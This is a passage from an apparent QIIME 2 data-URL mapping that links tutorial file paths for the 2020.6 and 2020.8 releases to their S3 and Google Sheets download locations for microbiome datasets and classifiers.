'2020.6/tutorials/atacama-soils/1p/reverse.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/atacama-soils/1p/reverse.fastq.gz',
'2020.6/tutorials/chimera/atacama-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/chimera/atacama-table.qza',
'2020.6/tutorials/chimera/atacama-rep-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/chimera/atacama-rep-seqs.qza',
'2020.6/tutorials/exporting/feature-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/exporting/feature-table.qza',
'2020.6/tutorials/exporting/unrooted-tree.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/exporting/unrooted-tree.qza',
'2020.6/tutorials/filtering/distance-matrix.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/filtering/distance-matrix.qza',
'2020.6/tutorials/filtering/table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/filtering/table.qza',
'2020.6/tutorials/filtering/taxonomy.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/filtering/taxonomy.qza',
'2020.6/tutorials/filtering/sequences.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/filtering/sequences.qza',
'2020.6/tutorials/fmt/fmt-tutorial-demux-1-10p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/fmt/fmt-tutorial-demux-1-10p.qza',
'2020.6/tutorials/fmt/fmt-tutorial-demux-1-1p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/fmt/fmt-tutorial-demux-1-1p.qza',
'2020.6/tutorials/fmt/fmt-tutorial-demux-2-10p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/fmt/fmt-tutorial-demux-2-10p.qza',
'2020.6/tutorials/fmt/fmt-tutorial-demux-2-1p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/fmt/fmt-tutorial-demux-2-1p.qza',
'2020.6/tutorials/fmt-cdiff-khanna/manifest.csv':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.6/tutorials/fmt-cdiff-khanna/manifest.csv',
'2020.6/tutorials/fmt-cdiff-khanna/sequence_files.zip':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.6/tutorials/fmt-cdiff-khanna/sequence_files.zip',
'2020.6/tutorials/gneiss/sample-metadata.tsv':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/gneiss/sample-metadata.tsv',
'2020.6/tutorials/gneiss/table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/gneiss/table.qza',
'2020.6/tutorials/gneiss/taxa.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/gneiss/taxa.qza',
'2020.6/tutorials/importing/aligned-sequences.fna':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/importing/aligned-sequences.fna',
'2020.6/tutorials/importing/casava-18-paired-end-demultiplexed.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/importing/casava-18-paired-end-demultiplexed.zip',
'2020.6/tutorials/importing/casava-18-single-end-demultiplexed.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/importing/casava-18-single-end-demultiplexed.zip',
'2020.6/tutorials/importing/feature-table-v100.biom':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/importing/feature-table-v100.biom',
'2020.6/tutorials/importing/feature-table-v210.biom':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/importing/feature-table-v210.biom',
'2020.6/tutorials/importing/muxed-se-barcode-in-seq.fastq.gz':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.6/tutorials/importing/muxed-se-barcode-in-seq.fastq.gz',
'2020.6/tutorials/importing/pe-64-manifest':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/importing/pe-64-manifest',
'2020.6/tutorials/importing/pe-64.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/importing/pe-64.zip',
'2020.6/tutorials/importing/se-33-manifest':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/importing/se-33-manifest',
'2020.6/tutorials/importing/se-33.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/importing/se-33.zip',
'2020.6/tutorials/importing/sequences.fna':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/importing/sequences.fna',
'2020.6/tutorials/importing/unrooted-tree.tre':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/importing/unrooted-tree.tre',
'2020.6/tutorials/importing/muxed-pe-barcode-in-seq/forward.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/importing/muxed-pe-barcode-in-seq/forward.fastq.gz',
'2020.6/tutorials/importing/muxed-pe-barcode-in-seq/reverse.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/importing/muxed-pe-barcode-in-seq/reverse.fastq.gz',
'2020.6/tutorials/longitudinal/ecam_table_taxa.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/longitudinal/ecam_table_taxa.qza',
'2020.6/tutorials/longitudinal/ecam_shannon.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/longitudinal/ecam_shannon.qza',
'2020.6/tutorials/longitudinal/unweighted_unifrac_distance_matrix.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/longitudinal/unweighted_unifrac_distance_matrix.qza',
'2020.6/tutorials/longitudinal/ecam_table_maturity.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/longitudinal/ecam_table_maturity.qza',
'2020.6/tutorials/moving-pictures/emp-single-end-sequences/barcodes.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/moving-pictures/emp-single-end-sequences/barcodes.fastq.gz',
'2020.6/tutorials/moving-pictures/emp-single-end-sequences/sequences.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/moving-pictures/emp-single-end-sequences/sequences.fastq.gz',
'2020.6/tutorials/metadata/faith_pd_vector.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/metadata/faith_pd_vector.qza',
'2020.6/tutorials/metadata/rep-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/metadata/rep-seqs.qza',
'2020.6/tutorials/metadata/taxonomy.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/metadata/taxonomy.qza',
'2020.6/tutorials/metadata/unweighted_unifrac_pcoa_results.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/metadata/unweighted_unifrac_pcoa_results.qza',
'2020.6/tutorials/otu-clustering/seqs.fna':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/otu-clustering/seqs.fna',
'2020.6/tutorials/otu-clustering/85_otus.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/otu-clustering/85_otus.qza',
'2020.6/tutorials/pd-mice/animal_distal_gut.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.6/tutorials/pd-mice/animal_distal_gut.qza',
'2020.6/tutorials/pd-mice/demultiplexed_seqs.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/pd-mice/demultiplexed_seqs.zip',
'2020.6/tutorials/pd-mice/manifest':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/pd-mice/manifest',
'2020.6/tutorials/pd-mice/ref_seqs_v4.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.6/tutorials/pd-mice/ref_seqs_v4.qza',
'2020.6/tutorials/pd-mice/ref_tax.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.6/tutorials/pd-mice/ref_tax.qza',
'2020.6/tutorials/quality-control/qc-mock-3-expected.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/quality-control/qc-mock-3-expected.qza',
'2020.6/tutorials/quality-control/qc-mock-3-observed.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/quality-control/qc-mock-3-observed.qza',
'2020.6/tutorials/quality-control/query-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/quality-control/query-seqs.qza',
'2020.6/tutorials/quality-control/reference-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/quality-control/reference-seqs.qza',
'2020.6/tutorials/quality-control/query-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/quality-control/query-table.qza',
'2020.6/tutorials/read-joining/atacama-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/read-joining/atacama-seqs.qza',
'2020.6/tutorials/read-joining/fj-joined.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/read-joining/fj-joined.zip',
'2020.6/tutorials/sample-classifier/atacama-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/sample-classifier/atacama-table.qza',
'2020.6/tutorials/sample-classifier/moving-pictures-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/sample-classifier/moving-pictures-table.qza',
'2020.6/tutorials/training-feature-classifiers/85_otu_taxonomy.txt':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/training-feature-classifiers/85_otu_taxonomy.txt',
'2020.6/tutorials/training-feature-classifiers/85_otus.fasta':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/training-feature-classifiers/85_otus.fasta',
'2020.6/tutorials/training-feature-classifiers/rep-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/training-feature-classifiers/rep-seqs.qza',
'2020.6/tutorials/phylogeny/rep-seqs.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.6/tutorials/phylogeny/rep-seqs.qza',
'2020.6/tutorials/utilities/faith-pd-vector.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.6/tutorials/utilities/faith-pd-vector.qza',
'2020.6/tutorials/utilities/jaccard-pcoa.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.6/tutorials/utilities/jaccard-pcoa.qza',
'2020.6/tutorials/utilities/taxa-barplot.qzv':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.6/tutorials/utilities/taxa-barplot.qzv',
# Sample Metadata (hosted on Google Sheets)
## FMT
'2020.6/tutorials/fmt/sample_metadata':
'https://docs.google.com/spreadsheets/d/19rReXhmTT-UXPw4qDzH3bIGZ3xE2EaWQ4AX6w78E19k/edit?usp=sharing',
'2020.6/tutorials/fmt/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/19rReXhmTT-UXPw4qDzH3bIGZ3xE2EaWQ4AX6w78E19k/export?gid=0&format=tsv',
## Moving Pictures
'2020.6/tutorials/moving-pictures/sample_metadata':
'https://docs.google.com/spreadsheets/d/1zCErEpDf5JCXoMmDQWYToIPn07vWdsyKg4UbFc2JgLA/edit?usp=sharing',
'2020.6/tutorials/moving-pictures/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/1zCErEpDf5JCXoMmDQWYToIPn07vWdsyKg4UbFc2JgLA/export?gid=0&format=tsv',
## Atacama
'2020.6/tutorials/atacama-soils/sample_metadata':
'https://docs.google.com/spreadsheets/d/1I2UPNUSJrULSjLa42Dp1cAjvtgEEmK9MAgQyAMBdZ90/edit?usp=sharing',
'2020.6/tutorials/atacama-soils/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/1I2UPNUSJrULSjLa42Dp1cAjvtgEEmK9MAgQyAMBdZ90/export?gid=0&format=tsv',
## The following tutorials are the "weird" ones, they use the *new* docs sharing menu, via "File -> Publish to the Web" dialog for TSV export.
## Longitudinal
'2020.6/tutorials/longitudinal/sample_metadata':
'https://docs.google.com/spreadsheets/d/18tYREhE5HcRVTCX3740KXeBOTL7duf_7EeU3MpF7DlE/edit?usp=sharing',
'2020.6/tutorials/longitudinal/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/e/2PACX-1vR6EuKUDh2208iwVW1QZ3LLf_QQGwAYB44mhd84BxIIcOLI7aRxNH4m2bS3bDwr6hGjUpDPBfOeoXyN/pub?gid=1303657428&single=true&output=tsv',
## FMT Cdiff
'2020.6/tutorials/fmt-cdiff-khanna/sample_metadata':
'https://docs.google.com/spreadsheets/d/1Kz6pYslJwbZ75mVcuDkJ6RK9KA0Y205x2958DMBtp2w/edit?usp=sharing',
'2020.6/tutorials/fmt-cdiff-khanna/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/e/2PACX-1vTv3HpYXSClxj1jMoFypgKZKMOjdRQ76JhPHaXvQk6-rgnbh4kBGDZyEPjUwhIj-s59j2EVIOGdA2Kz/pub?gid=283132897&single=true&output=tsv',
## PD Mice
'2020.6/tutorials/pd-mice/sample_metadata':
'https://docs.google.com/spreadsheets/d/1y8__mN4f58D2JCpz2X6mEVQlDYRXnvxhl5A5MPy7nAM/edit?usp=sharing',
'2020.6/tutorials/pd-mice/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/e/2PACX-1vSrf5DfuqbDrn2KgX_A2L5oxrGd2-gWPCGoJlvJKsQa1qQai08-C4HHHI7d_sSM_Sr_OcBJqUjJJLUm/pub?gid=1509704122&single=true&output=tsv',
# 2020.8
'2020.8/common/gg-13-8-99-515-806-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/common/gg-13-8-99-515-806-nb-classifier.qza',
'2020.8/common/gg-13-8-99-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/common/gg-13-8-99-nb-classifier.qza',
'2020.8/common/sepp-refs-gg-13-8.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/common/sepp-refs-gg-13-8.qza',
'2020.8/common/sepp-refs-silva-128.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/common/sepp-refs-silva-128.qza',
'2020.8/common/silva-138-99-515-806-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/common/silva-138-99-515-806-nb-classifier.qza',
'2020.8/common/silva-138-99-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/common/silva-138-99-nb-classifier.qza',
'2020.8/common/silva-138-99-seqs-515-806.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.8/common/silva-138-99-seqs-515-806.qza',
'2020.8/common/silva-138-99-seqs.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.8/common/silva-138-99-seqs.qza',
'2020.8/common/silva-138-99-tax-515-806.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.8/common/silva-138-99-tax-515-806.qza',
'2020.8/common/silva-138-99-tax.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.8/common/silva-138-99-tax.qza',
'2020.8/tutorials/atacama-soils/10p/barcodes.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/atacama-soils/10p/barcodes.fastq.gz',
'2020.8/tutorials/atacama-soils/10p/forward.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/atacama-soils/10p/forward.fastq.gz',
'2020.8/tutorials/atacama-soils/10p/reverse.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/atacama-soils/10p/reverse.fastq.gz',
'2020.8/tutorials/atacama-soils/1p/barcodes.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/atacama-soils/1p/barcodes.fastq.gz',
'2020.8/tutorials/atacama-soils/1p/forward.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/atacama-soils/1p/forward.fastq.gz',
'2020.8/tutorials/atacama-soils/1p/reverse.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/atacama-soils/1p/reverse.fastq.gz',
'2020.8/tutorials/chimera/atacama-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/chimera/atacama-table.qza',
'2020.8/tutorials/chimera/atacama-rep-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/chimera/atacama-rep-seqs.qza',
'2020.8/tutorials/exporting/feature-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/exporting/feature-table.qza',
'2020.8/tutorials/exporting/unrooted-tree.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/exporting/unrooted-tree.qza',
'2020.8/tutorials/filtering/distance-matrix.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/filtering/distance-matrix.qza',
'2020.8/tutorials/filtering/table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/filtering/table.qza',
'2020.8/tutorials/filtering/taxonomy.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/filtering/taxonomy.qza',
'2020.8/tutorials/filtering/sequences.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/filtering/sequences.qza',
'2020.8/tutorials/fmt/fmt-tutorial-demux-1-10p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/fmt/fmt-tutorial-demux-1-10p.qza',
'2020.8/tutorials/fmt/fmt-tutorial-demux-1-1p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/fmt/fmt-tutorial-demux-1-1p.qza',
'2020.8/tutorials/fmt/fmt-tutorial-demux-2-10p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/fmt/fmt-tutorial-demux-2-10p.qza',
'2020.8/tutorials/fmt/fmt-tutorial-demux-2-1p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/fmt/fmt-tutorial-demux-2-1p.qza',
'2020.8/tutorials/fmt-cdiff-khanna/manifest.csv':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.8/tutorials/fmt-cdiff-khanna/manifest.csv',
'2020.8/tutorials/fmt-cdiff-khanna/sequence_files.zip':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.8/tutorials/fmt-cdiff-khanna/sequence_files.zip',
'2020.8/tutorials/gneiss/sample-metadata.tsv':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/gneiss/sample-metadata.tsv',
'2020.8/tutorials/gneiss/table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/gneiss/table.qza',
'2020.8/tutorials/gneiss/taxa.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/gneiss/taxa.qza',
'2020.8/tutorials/importing/aligned-sequences.fna':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/importing/aligned-sequences.fna',
'2020.8/tutorials/importing/casava-18-paired-end-demultiplexed.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/importing/casava-18-paired-end-demultiplexed.zip',
'2020.8/tutorials/importing/casava-18-single-end-demultiplexed.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/importing/casava-18-single-end-demultiplexed.zip',
'2020.8/tutorials/importing/feature-table-v100.biom':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/importing/feature-table-v100.biom',
'2020.8/tutorials/importing/feature-table-v210.biom':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/importing/feature-table-v210.biom',
'2020.8/tutorials/importing/muxed-se-barcode-in-seq.fastq.gz':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.8/tutorials/importing/muxed-se-barcode-in-seq.fastq.gz',
'2020.8/tutorials/importing/pe-64-manifest':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/importing/pe-64-manifest',
'2020.8/tutorials/importing/pe-64.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/importing/pe-64.zip',
'2020.8/tutorials/importing/se-33-manifest':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/importing/se-33-manifest',
'2020.8/tutorials/importing/se-33.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/importing/se-33.zip',
'2020.8/tutorials/importing/sequences.fna':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/importing/sequences.fna',
'2020.8/tutorials/importing/unrooted-tree.tre':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/importing/unrooted-tree.tre',
'2020.8/tutorials/importing/muxed-pe-barcode-in-seq/forward.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/importing/muxed-pe-barcode-in-seq/forward.fastq.gz',
'2020.8/tutorials/importing/muxed-pe-barcode-in-seq/reverse.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/importing/muxed-pe-barcode-in-seq/reverse.fastq.gz',
'2020.8/tutorials/longitudinal/ecam_table_taxa.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/longitudinal/ecam_table_taxa.qza',
'2020.8/tutorials/longitudinal/ecam_shannon.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/longitudinal/ecam_shannon.qza',
'2020.8/tutorials/longitudinal/unweighted_unifrac_distance_matrix.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/longitudinal/unweighted_unifrac_distance_matrix.qza',
'2020.8/tutorials/longitudinal/ecam_table_maturity.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/longitudinal/ecam_table_maturity.qza',
'2020.8/tutorials/moving-pictures/emp-single-end-sequences/barcodes.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/moving-pictures/emp-single-end-sequences/barcodes.fastq.gz',
'2020.8/tutorials/moving-pictures/emp-single-end-sequences/sequences.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/moving-pictures/emp-single-end-sequences/sequences.fastq.gz',
'2020.8/tutorials/metadata/faith_pd_vector.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/metadata/faith_pd_vector.qza',
'2020.8/tutorials/metadata/rep-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/metadata/rep-seqs.qza',
'2020.8/tutorials/metadata/taxonomy.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/metadata/taxonomy.qza',
'2020.8/tutorials/metadata/unweighted_unifrac_pcoa_results.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/metadata/unweighted_unifrac_pcoa_results.qza',
'2020.8/tutorials/otu-clustering/seqs.fna':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/otu-clustering/seqs.fna',
'2020.8/tutorials/otu-clustering/85_otus.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/otu-clustering/85_otus.qza',
'2020.8/tutorials/pd-mice/animal_distal_gut.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.8/tutorials/pd-mice/animal_distal_gut.qza',
'2020.8/tutorials/pd-mice/demultiplexed_seqs.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/pd-mice/demultiplexed_seqs.zip',
'2020.8/tutorials/pd-mice/manifest':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/pd-mice/manifest',
'2020.8/tutorials/pd-mice/ref_seqs_v4.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.8/tutorials/pd-mice/ref_seqs_v4.qza',
'2020.8/tutorials/pd-mice/ref_tax.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.8/tutorials/pd-mice/ref_tax.qza',
'2020.8/tutorials/quality-control/qc-mock-3-expected.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/quality-control/qc-mock-3-expected.qza',
'2020.8/tutorials/quality-control/qc-mock-3-observed.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/quality-control/qc-mock-3-observed.qza',
'2020.8/tutorials/quality-control/query-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/quality-control/query-seqs.qza',
'2020.8/tutorials/quality-control/reference-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/quality-control/reference-seqs.qza',
'2020.8/tutorials/quality-control/query-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/quality-control/query-table.qza',
'2020.8/tutorials/read-joining/atacama-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/read-joining/atacama-seqs.qza',
'2020.8/tutorials/read-joining/fj-joined.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/read-joining/fj-joined.zip',
'2020.8/tutorials/sample-classifier/atacama-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/sample-classifier/atacama-table.qza',
'2020.8/tutorials/sample-classifier/moving-pictures-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/sample-classifier/moving-pictures-table.qza',
'2020.8/tutorials/training-feature-classifiers/85_otu_taxonomy.txt':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/training-feature-classifiers/85_otu_taxonomy.txt',
'2020.8/tutorials/training-feature-classifiers/85_otus.fasta':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/training-feature-classifiers/85_otus.fasta',
'2020.8/tutorials/training-feature-classifiers/rep-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/training-feature-classifiers/rep-seqs.qza',
'2020.8/tutorials/phylogeny/rep-seqs.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.8/tutorials/phylogeny/rep-seqs.qza',
'2020.8/tutorials/utilities/faith-pd-vector.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.8/tutorials/utilities/faith-pd-vector.qza',
'2020.8/tutorials/utilities/jaccard-pcoa.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.8/tutorials/utilities/jaccard-pcoa.qza',
'2020.8/tutorials/utilities/taxa-barplot.qzv':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.8/tutorials/utilities/taxa-barplot.qzv',
# Sample Metadata (hosted on Google Sheets)
## FMT
'2020.8/tutorials/fmt/sample_metadata':
'https://docs.google.com/spreadsheets/d/1MEiItba3d_usUXYqWUhJ_Fk2tR4PgRbqbzPEmqssup8/edit?usp=sharing',
'2020.8/tutorials/fmt/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/1MEiItba3d_usUXYqWUhJ_Fk2tR4PgRbqbzPEmqssup8/export?gid=0&format=tsv',
## Moving Pictures
'2020.8/tutorials/moving-pictures/sample_metadata':
'https://docs.google.com/spreadsheets/d/1_JV-bCWpH2JBH-SEgMRLcQn5Sn8nVvuFnn4G50Jc72M/edit?usp=sharing',
'2020.8/tutorials/moving-pictures/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/1_JV-bCWpH2JBH-SEgMRLcQn5Sn8nVvuFnn4G50Jc72M/export?gid=0&format=tsv',
## Atacama
'2020.8/tutorials/atacama-soils/sample_metadata':
'https://docs.google.com/spreadsheets/d/1OZtpMzJ0vRhRk_1DA3nYuhA-OLfo6MZYHIHAqRbKVB4/edit?usp=sharing',
'2020.8/tutorials/atacama-soils/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/1OZtpMzJ0vRhRk_1DA3nYuhA-OLfo6MZYHIHAqRbKVB4/export?gid=0&format=tsv',
## The following tutorials are the "weird" ones, they use the *new* docs sharing menu, via "File -> Publish to the Web" dialog for TSV export.
## Longitudinal
'2020.8/tutorials/longitudinal/sample_metadata':
'https://docs.google.com/spreadsheets/d/1QcESE0rJh8ER5AiQSxpdgyVkedVW6JeXaYYG6TCnoEI/edit?usp=sharing',
'2020.8/tutorials/longitudinal/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/e/2PACX-1vT2v_BqLUKQMl3aS6D18Ny6rW2ftX0NvwRjD4v-JGXAMMraMfO0VmssCnKdyORerWrXQ6cYmCLb4jSi/pub?gid=1303657428&single=true&output=tsv',
## PD Mice
'2020.8/tutorials/pd-mice/sample_metadata':
'https://docs.google.com/spreadsheets/d/1SDBD5gYFy2ck_vZXdj2oBix5XCtnWMPVbs0aaLcdccw/edit?usp=sharing',
'2020.8/tutorials/pd-mice/sample_metadata.tsv':
